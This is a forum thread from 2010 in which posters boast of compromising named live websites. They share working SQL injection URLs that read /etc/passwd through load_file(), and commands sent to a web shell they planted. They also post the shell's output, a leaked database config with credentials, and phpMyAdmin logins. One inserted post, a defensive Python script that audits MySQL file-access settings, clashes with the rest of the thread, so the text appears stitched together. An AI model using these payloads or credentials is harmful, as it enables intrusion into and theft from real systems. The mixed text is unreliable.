eset[dot]hk payment site vulnerable again.
Posted by: VMw4r3
Date: July 29, 2010 07:15PM

http://isrtinkode.wordpress.com/2010/03/21/eset-nod32-hong-kong-hacked/

Tink0de and I took over ESET's Hong Kong server through this site. It was on the same server as a payment system, I think.
It's vulnerable again... You would think they would know better.
I haven't seen ESET on this server yet; I think they have moved.....

hxxp://www.version-2.com/ipevo/product/details_exp.php?fn=1 and 1=2 union all select 1,2,load_file('/etc/passwd'),4,5,6--

Re: eset[dot]hk payment site vulnerable again.
Posted by: hyrax
Date: August 05, 2010 09:27PM

Do you know why /etc/shadow or gshadow doesn't show anything?

Same thing happens with:

hxxp://www.lelon.com.tw/index.php?fn=cat&id=12 and 1=2 UNION ALL SELECT 1,load_file('/etc/passwd')--

/etc/shadow doesn't show anything



Edited 3 time(s). Last edit at 08/05/2010 09:34PM by hyrax.

Re: eset[dot]hk payment site vulnerable again.
Posted by: alexfoo
Date: August 06, 2010 01:12AM

/etc/shadow is only readable by root; mysqld is run by nobody (or a similar low-privilege user).

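The point alexfoo makes above, that load_file() only reaches what the OS account running mysqld can read, is exactly what a defender audits. As an added example (not code from this thread), here is a small Python script that reads a my.cnf and reports the two settings that decide how far a file-read primitive in SQL reaches: the `user` option and `secure_file_priv`. The two configurations embedded in it are constructed for the example.

```python
"""Audit a MySQL [mysqld] configuration for the settings that bound load_file().

Added example; not code from the forum thread. load_file() reads with the OS
privileges of the mysqld process, so a root-only file such as /etc/shadow
returns NULL even when the injection itself works. Two settings decide how far
that read primitive reaches: the OS account mysqld runs as ("user") and
secure_file_priv, which is unrestricted when empty, confined to one directory
when set to a path, and disables file import/export when set to NULL.
"""
import configparser
from dataclasses import dataclass

# Constructed sample configurations for this example.
WEAK_MY_CNF = """
[mysqld]
datadir = /var/lib/mysql
user = root
secure-file-priv =
"""

HARDENED_MY_CNF = """
[mysqld]
datadir = /var/lib/mysql
user = mysql
secure_file_priv = NULL
"""

SEVERITY_RANK = {"info": 0, "medium": 1, "high": 2}


@dataclass
class Finding:
    setting: str
    value: str
    severity: str
    message: str


def load_mysqld_options(cnf_text):
    """Return the [mysqld] options as a dict, with '-' in keys normalised to '_'."""
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    # my.cnf may carry "!include" / "!includedir" directives that configparser rejects.
    cleaned = "\n".join(line for line in cnf_text.splitlines()
                        if not line.lstrip().startswith("!"))
    parser.read_string(cleaned)
    if not parser.has_section("mysqld"):
        return {}
    return {key.replace("-", "_"): (value or "").strip()
            for key, value in parser.items("mysqld")}


def audit_file_access(cnf_text):
    """Return Finding objects for the 'user' and 'secure_file_priv' settings."""
    opts = load_mysqld_options(cnf_text)
    findings = []

    user = opts.get("user")
    if user is None:
        findings.append(Finding("user", "", "medium",
                                "not set: the account is decided by the init script; verify with ps"))
    elif user == "root":
        findings.append(Finding("user", user, "high",
                                "mysqld runs as root: load_file() can read /etc/shadow and any other file"))
    else:
        findings.append(Finding("user", user, "info",
                                f"runs as unprivileged '{user}': load_file() is limited to that user's reads"))

    sfp = opts.get("secure_file_priv")
    if sfp is None:
        findings.append(Finding("secure_file_priv", "", "medium",
                                "not set: the default depends on the server build; confirm with SHOW VARIABLES"))
    elif sfp == "":
        findings.append(Finding("secure_file_priv", "", "high",
                                "empty: LOAD_FILE() and SELECT ... INTO OUTFILE may use any path the OS user can"))
    elif sfp.upper() == "NULL":
        findings.append(Finding("secure_file_priv", sfp, "info",
                                "NULL: file import and export are disabled"))
    else:
        findings.append(Finding("secure_file_priv", sfp, "medium",
                                f"restricted to {sfp}; keep that directory outside the web root"))
    return findings


def worst_severity(findings):
    """Highest severity among the findings ('info' when there are none)."""
    return max((f.severity for f in findings), key=SEVERITY_RANK.__getitem__, default="info")


if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_MY_CNF), ("hardened", HARDENED_MY_CNF)):
        findings = audit_file_access(cnf)
        print(f"== {name}: worst = {worst_severity(findings)}")
        for f in findings:
            print(f"  [{f.severity}] {f.setting}={f.value!r}: {f.message}")
```

The script only reads the static file; the running server may have been started with command-line overrides, so the values it reports should be confirmed against `SHOW VARIABLES LIKE 'secure_file_priv'` and the process owner shown by `ps`.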
Re: eset[dot]hk payment site vulnerable again.
Posted by: hyrax
Date: August 06, 2010 02:38PM

alexfoo Wrote:
-------------------------------------------------------
> /etc/shadow is only readable by root, mysqld is
> ran by nobody (or similar low-privilege user).


Thanks.

Re: eset[dot]hk payment site vulnerable again.
Posted by: VMw4r3
Date: August 10, 2010 04:52PM

@hyrax
You're demo@localhost, but you have privileges to write in the images directory and take over the server.

hxxxp://www.lelon.com.tw/images/small.php?cmd=uname -a

Linux localhost.localdomain 2.6.15-1.2054_FC5smp #1 SMP Tue Mar 14 16:05:46 EST 2006 i686 i686 i386 GNU/Linux


hxxxp://www.lelon.com.tw/images/small.php?cmd=cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
beagleindex:x:58:58:User for Beagle indexing:/var/cache/beagle:/bin/false
distcache:x:94:94:Distcache:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sal001:x:500:500::/home/sal001:/bin/bash
mis003:x:501:501:mis003:/home/mis003:/bin/bash
ftpuser:x:503:503::/home/ftpuser:/bin/bash

Re: eset[dot]hk payment site vulnerable again.
Posted by: VMw4r3
Date: August 10, 2010 05:03PM

Plain text:

hxxp://www.lelon.com.tw/lib/config.inc

<?php
// Database settings
$DBHOST = 'localhost';
$DBUSER = 'demo';
$DBPASS = 'demo';
$DBNAME = 'lelon';

http://www.lelon.com.tw/phpMyAdmin/

.htaccess user/pass
demo/demo

I'm gonna delete the shell now,
total 3736
drwxr-xrwx 4 mis003 mis003 4096 Aug 11 05:20 .
drwxrwxrwx 20 mis003 mis003 4096 Aug 9 14:46 ..
-rw-rw-rw- 1 mysql mysql 69 Aug 11 04:56 123.txt
-rwxr-xrwx 1 1000 users 215552 Apr 26 2007 Thumbs.db
-rw-r--r-- 1 ftpuser ftpuser 295256 Apr 26 2007 WS_FTP.LOG
-rwxr-xrwx 1 1000 users 55677 Apr 26 2007 about.swf
drwxr-xrwx 2 1000 users 4096 Jun 11 2008 admin
-rwxr-xrwx 1 1000 users 69 Apr 26 2007 arrow_first.gif
-rwxr-xrwx 1 1000 users 69 Apr 26 2007 arrow_last.gif
-rwxr-xrwx 1 1000 users 76 Apr 26 2007 arrows.gif
-rwxr-xrwx 1 1000 users 180 Apr 26 2007 back.gif
-rwxr-xrwx 1 1000 users 2365 Apr 26 2007 bg_14001_r1_c1.gif
-rw-r--r-- 1 ftpuser ftpuser 1884 Apr 26 2007 bg_16949_r1_c1.gif
-rwxr-xrwx 1 1000 users 2389 Apr 26 2007 bg_9000_r1_c1.gif
-rwxr-xrwx 1 1000 users 696 Apr 26 2007 bg_9000_r2_c1.gif
-rwxr-xrwx 1 1000 users 1796 Apr 26 2007 bg_9000_r3_c1.gif
-rwxr-xrwx 1 1000 users 2353 Apr 26 2007 bg_9001_r1_c1.gif
-rwxr-xrwx 1 1000 users 929 Apr 26 2007 bg_p_r1_c1.jpg
-rwxr-xrwx 1 1000 users 1714 Apr 26 2007 bg_p_r1_c2.jpg
-rwxr-xrwx 1 1000 users 1008 Apr 26 2007 bg_p_r1_c3.jpg
-rwxr-xrwx 1 1000 users 1781 Apr 26 2007 bg_p_r2_c2.jpg
-rwxr-xrwx 1 1000 users 3794 Apr 26 2007 bg_search.gif
-rwxr-xrwx 1 1000 users 1904 Apr 26 2007 bg_search_g.gif
-rwxr-xrwx 1 1000 users 596 Apr 26 2007 bg_t.gif
-rwxr-xrwx 1 1000 users 146 Apr 26 2007 botton_bro.gif
-rwxr-xrwx 1 1000 users 908 Apr 26 2007 botton_resume.gif
-rwxr-xrwx 1 1000 users 906 Apr 26 2007 botton_search.gif
-rwxr-xrwx 1 1000 users 220 Apr 26 2007 botton_yes.gif
-rwxr-xrwx 1 1000 users 22967 Apr 26 2007 contact.swf
-rwxr-xrwx 1 1000 users 1290 Apr 26 2007 distributor.gif
-rwxr-xrwx 1 1000 users 328 Apr 26 2007 div_1.jpg
-rwxr-xrwx 1 1000 users 45 Apr 26 2007 dot.gif
-rwxr-xrwx 1 1000 users 54 Apr 26 2007 dot05.gif
-rwxr-xrwx 1 1000 users 8284 Apr 26 2007 ecap.gif
-rwxr-xrwx 1 1000 users 6222 Apr 26 2007 ecap_link.gif
-rwxr-xrwx 1 1000 users 1953 Apr 26 2007 get_adobe_reader.gif
-rwxr-xrwx 1 1000 users 18570 Apr 26 2007 hr.swf
-rwxr-xrwx 1 1000 users 33298 Apr 26 2007 icon.psd
-rwxr-xrwx 1 1000 users 185 Apr 26 2007 icon_01.gif
-rwxr-xrwx 1 1000 users 330 Apr 26 2007 icon_07.gif
-rwxr-xrwx 1 1000 users 1010 Apr 26 2007 icon_close.gif
-rwxr-xrwx 1 1000 users 587 Apr 26 2007 icon_con.gif
-rwxr-xrwx 1 1000 users 1733 Apr 26 2007 icon_d.jpg
-rwxr-xrwx 1 1000 users 397 Apr 26 2007 icon_env.gif
-rwxr-xrwx 1 1000 users 1969 Apr 26 2007 icon_pdf.jpg
-rwxr-xrwx 1 1000 users 672 Apr 26 2007 icon_sear.gif
-rwxr-xrwx 1 1000 users 1188 Apr 26 2007 img01.gif
-rwxr-xrwx 1 1000 users 1188 Apr 26 2007 img02.gif
-rwxr-xrwx 1 1000 users 46678 Apr 26 2007 img_about.jpg
-rwxr-xrwx 1 1000 users 24128 Apr 26 2007 img_app_r1_c1.jpg
-rwxr-xrwx 1 1000 users 21775 Apr 26 2007 img_app_r1_c2.jpg
-rwxr-xrwx 1 1000 users 32511 Apr 26 2007 img_app_r2_c1.jpg
-rwxr-xrwx 1 1000 users 35353 Apr 26 2007 img_app_r2_c2.jpg
-rwxr-xrwx 1 1000 users 27452 Apr 26 2007 img_app_r3_c1.jpg
-rwxr-xrwx 1 1000 users 31872 Apr 26 2007 img_app_r3_c2.jpg
-rwxr-xrwx 1 1000 users 2679 Apr 26 2007 img_app_r4_c1.jpg
-rwxr-xrwx 1 1000 users 7882 Apr 26 2007 img_app_r4_c2.jpg
-rwxr-xrwx 1 1000 users 21124 Apr 26 2007 img_contact.jpg
-rwxr-xrwx 1 1000 users 37587 Apr 26 2007 img_ecap_r1_c1.gif
-rwxr-xrwx 1 1000 users 25887 Apr 26 2007 img_ecap_r1_c2.gif
-rwxr-xrwx 1 1000 users 61679 Apr 26 2007 img_hr.jpg
-rwxr-xrwx 1 1000 users 12514 Apr 26 2007 img_index.jpg
-rwxr-xrwx 1 1000 users 74956 Apr 26 2007 img_news.jpg
-rwxr-xrwx 1 1000 users 2856 Apr 26 2007 img_p01.jpg
-rwxr-xrwx 1 1000 users 2938 Apr 26 2007 img_p02.jpg
-rwxr-xrwx 1 1000 users 17512 Apr 26 2007 img_product.jpg
-rwxr-xrwx 1 1000 users 30348 Apr 26 2007 iso14001.jpg
-rwxr-xrwx 1 1000 users 23769 Apr 26 2007 iso9001.jpg
-rwxr-xrwx 1 1000 users 38013 Apr 26 2007 know_how.jpg
-rwxr-xrwx 1 1000 users 182 Apr 26 2007 line.gif
-rwxr-xrwx 1 1000 users 4159 Apr 26 2007 logo.gif
-rwxr-xrwx 1 1000 users 68905 Apr 26 2007 logo.psd
-rwxr-xrwx 1 1000 users 174677 Apr 26 2007 main.swf
-rwxr-xrwx 1 1000 users 39306 Apr 26 2007 map.jpg
-rwxr-xrwx 1 1000 users 22244 Apr 26 2007 news.swf
-rwxr-xrwx 1 1000 users 3407 Apr 26 2007 oc_con.jpg
-rwxr-xrwx 1 1000 users 4714 Apr 26 2007 peoples_2.jpg
-rwxr-xrwx 1 1000 users 8193 Apr 26 2007 peoples_3.jpg
-rwxr-xrwx 1 1000 users 7301 Apr 26 2007 peoples_6.jpg
-rwxr-xrwx 1 1000 users 4245 Apr 26 2007 peoples_7.jpg
drwxr-xrwx 2 1000 users 4096 Apr 26 2007 photo
-rwxr-xrwx 1 1000 users 1993 Apr 26 2007 pic_1.jpg
-rwxr-xrwx 1 1000 users 7600 Apr 26 2007 pic_p01.jpg
-rwxr-xrwx 1 1000 users 304 Apr 26 2007 pix_1.jpg
-rwxr-xrwx 1 1000 users 587 Apr 26 2007 point_1.jpg
-rwxr-xrwx 1 1000 users 468 Apr 26 2007 point_2.jpg
-rwxr-xrwx 1 1000 users 8544 Apr 26 2007 process.gif
-rwxr-xrwx 1 1000 users 13578 Apr 26 2007 process02.gif
-rwxr-xrwx 1 1000 users 669530 Apr 26 2007 process03.gif
-rwxr-xrwx 1 1000 users 35880 Apr 26 2007 products.swf
-rwxr-xrwx 1 1000 users 23476 Apr 26 2007 qs9000.jpg
-rw-rw-rw- 1 mysql mysql 150 Aug 11 05:01 ram.php
-rw-r--r-- 1 apache apache 99663 Aug 11 05:02 ram0.php
-rw-r--r-- 1 apache apache 99663 Aug 11 05:19 ram0.phtml
-rwxr-xrwx 1 1000 users 349 Apr 26 2007 rep_1.jpg
-rwxr-xrwx 1 1000 users 354 Apr 26 2007 rep_2.jpg
-rwxr-xrwx 1 1000 users 351 Apr 26 2007 rep_line.jpg
-rwxr-xrwx 1 1000 users 25475 Apr 26 2007 sbanner.swf
-rw-r--r-- 1 apache apache 36 Aug 11 05:20 small.php
-rw-rw-rw- 1 mysql mysql 36 Aug 11 05:03 small12345.php
-rwxr-xrwx 1 1000 users 43 Apr 26 2007 spacer.gif
-rwxr-xrwx 1 1000 users 432 Apr 26 2007 submit.jpg
-rwxr-xrwx 1 1000 users 4392 Apr 26 2007 tdimg_01.gif
-rwxr-xrwx 1 1000 users 2496 Apr 26 2007 tdimg_02.gif
-rwxr-xrwx 1 1000 users 42095 Apr 26 2007 tdimg_03.gif
-rwxr-xrwx 1 1000 users 2068 Apr 26 2007 tdimg_04.gif
-rwxr-xrwx 1 1000 users 725 Apr 26 2007 tdimg_05.gif
-rwxr-xrwx 1 1000 users 5351 Apr 26 2007 tdimg_06.gif
-rwxr-xrwx 1 1000 users 999 Apr 26 2007 tdimg_07.gif
-rwxr-xrwx 1 1000 users 69834 Apr 26 2007 text.psd
-rwxr-xrwx 1 1000 users 3250 Apr 26 2007 text_1.gif
-rwxr-xrwx 1 1000 users 465 Apr 26 2007 text_1.jpg
-rwxr-xrwx 1 1000 users 121 Apr 26 2007 text_2.gif
-rwxr-xrwx 1 1000 users 57384 Apr 26 2007 title.psd
-rwxr-xrwx 1 1000 users 651 Apr 26 2007 title01.gif
-rwxr-xrwx 1 1000 users 815 Apr 26 2007 title02.gif
-rwxr-xrwx 1 1000 users 810 Apr 26 2007 title03.gif
-rwxr-xrwx 1 1000 users 663 Apr 26 2007 title03_2.gif
-rwxr-xrwx 1 1000 users 624 Apr 26 2007 title03_2_s.gif
-rwxr-xrwx 1 1000 users 744 Apr 26 2007 title04.gif
-rwxr-xrwx 1 1000 users 651 Apr 26 2007 title05.gif
-rwxr-xrwx 1 1000 users 654 Apr 26 2007 title06.gif
-rwxr-xrwx 1 1000 users 748 Apr 26 2007 title07.gif
-rwxr-xrwx 1 1000 users 756 Apr 26 2007 title_contact.gif
-rwxr-xrwx 1 1000 users 589 Apr 26 2007 title_p.gif
-rwxr-xrwx 1 1000 users 610 Apr 26 2007 title_p02.gif
-rwxr-xrwx 1 1000 users 577 Apr 26 2007 title_p03.gif
-rwxr-xrwx 1 1000 users 756 Apr 26 2007 title_p04.gif
-rwxr-xrwx 1 1000 users 570 Apr 26 2007 title_p05.gif
-rwxr-xrwx 1 1000 users 691 Apr 26 2007 title_p06.gif
-rwxr-xrwx 1 1000 users 591 Apr 26 2007 title_s.gif
-rwxr-xrwx 1 1000 users 647 Apr 26 2007 title_search.gif
-rwxr-xrwx 1 1000 users 43 Apr 26 2007 tr1.gif
-rwxr-xrwx 1 1000 users 43 Apr 26 2007 tr2.gif
-rw-r--r-- 1 ftpuser ftpuser 15955 Apr 26 2007 ts16949.jpg
-rwxr-xrwx 1 1000 users 3214 Apr 26 2007 txt_distributor.gif
-rwxr-xrwx 1 1000 users 186 Apr 26 2007 up.gif



Edited 1 time(s). Last edit at 08/10/2010 11:21PM by VMw4r3.
